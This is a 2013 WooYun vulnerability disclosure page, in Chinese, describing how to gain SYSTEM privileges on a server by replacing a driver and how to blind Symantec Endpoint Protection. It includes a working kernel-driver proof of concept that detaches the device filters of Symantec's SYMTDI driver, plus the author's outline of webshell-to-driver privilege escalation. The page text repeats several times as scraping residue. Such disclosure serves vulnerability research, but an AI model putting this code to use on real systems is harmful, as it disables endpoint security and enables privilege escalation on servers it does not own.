借赛门铁透过攻破防病毒软件谈服务器提权（POC）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036254

漏洞标题：借赛门铁透过攻破防病毒软件谈服务器提权（POC）

漏洞作者： n0bele

提交时间：2013-09-06 11:24

修复时间：2013-12-05 11:25

公开时间：2013-12-05 11:25

漏洞类型：设计不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2013-12-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

有些厂商老觉得很多问题没必要修复，对此我只想套用一句老话，能力决定了你的眼界.自己不会利用，不代表着别人不会.所以安全厂商招人的时候别老招那种用汇编写管理系统的程序员，因为他们的思维就定格在那一亩三分地上.

详细说明：

借赛门铁克吐个槽，当然了国外大多数防病毒厂商都是不防驱动加载的.我不懂他们的设计思路，但事实是再优秀的防病毒引擎你也得先跑得起来不是？
驱动是什么权限?
system权限
怎么让驱动运行?
有的时候拿到了webshell没有执行程序、写注册表的权限,有的只是浏览、修改特定几个目录的权限。利用我前几天提到的方法，替换掉比如：C:\Program Files\目录下任意驱动，达到重启后自动执行驱动提权，具体payload代码网上有，自己找.
为什么不用lpk.dll等劫持提权？
因为杀毒软件会报的：）
恩，回到赛门铁克的问题，看POC吧

void FuckFilters(WCHAR * Name)
{
	UNICODE_STRING TName;
	PDRIVER_OBJECT TDrvObj;
	PDEVICE_OBJECT CurrentDevice;
	NTSTATUS status;
	RtlInitUnicodeString ( &TName, Name);
	status = ObReferenceObjectByName( &TName,
		OBJ_CASE_INSENSITIVE,
		NULL,
		0,
		*IoDriverObjectType,
		KernelMode,    
		NULL,
		(PVOID*)&TDrvObj);
	if(NT_SUCCESS(status))
	{
		if(TDrvObj)
		{
			CurrentDevice = TDrvObj->DeviceObject;
			while(CurrentDevice != NULL )
			{
				CurrentDevice->AttachedDevice = 0;
				CurrentDevice = CurrentDevice->NextDevice; 
			}
			ObDereferenceObject(TDrvObj);
		}
	}
}
NTSTATUS DriverEntry(
    IN OUT PDRIVER_OBJECT   DriverObject,
    IN PUNICODE_STRING      RegistryPath
    )
{
  FuckFilters(L"\\Driver\\SYMTDI");
}

漏洞证明：

这个是赛门铁克防病毒企业版更新到最新的版本
本来TDI好好的

执行代码后就啥也没了.

修复方案：

他们懂但不想修复，我也没办法

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

2013-09-06 13:06 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

简要描述很有意思
2013-09-06 14:12 | Fakehac ( 路人 | Rank:12 漏洞数:1 | 菜鸟刚来，努力挖洞洞。。。)

貌似厄只会懂点汇编。顺便说一下，招汇编的顶多就是去处理病毒，鉴黑白的流水线工程师而已。写杀毒引擎，杀毒软件的，都是高级语言，牛逼的那种，所以不能以偏概全。
2013-09-06 14:25 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清，和风送闲，可叹那俊逸如我顾影自...)

嘿嘿
2013-09-06 18:11 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活，亭长放解)

杀毒软件能正确查杀多少毒才是主要问题，所以一般招会汇编会逆向工程的多，杀毒软件本身并没有什么好写的。
2013-09-07 22:08 | 小九 ( 路人 | Rank:16 漏洞数:5 | 非尖刀小九,民间草根)

关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036254

漏洞标题：借赛门铁透过攻破防病毒软件谈服务器提权（POC）

相关厂商：赛门铁克

漏洞作者： n0bele

提交时间：2013-09-06 11:24

修复时间：2013-12-05 11:25

公开时间：2013-12-05 11:25

漏洞类型：设计不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-036254

漏洞标题：借赛门铁透过攻破防病毒软件谈服务器提权（POC）

相关厂商：赛门铁克

漏洞作者： n0bele

提交时间：2013-09-06 11:24

修复时间：2013-12-05 11:25

公开时间：2013-12-05 11:25

漏洞类型：设计不当

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-036254"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：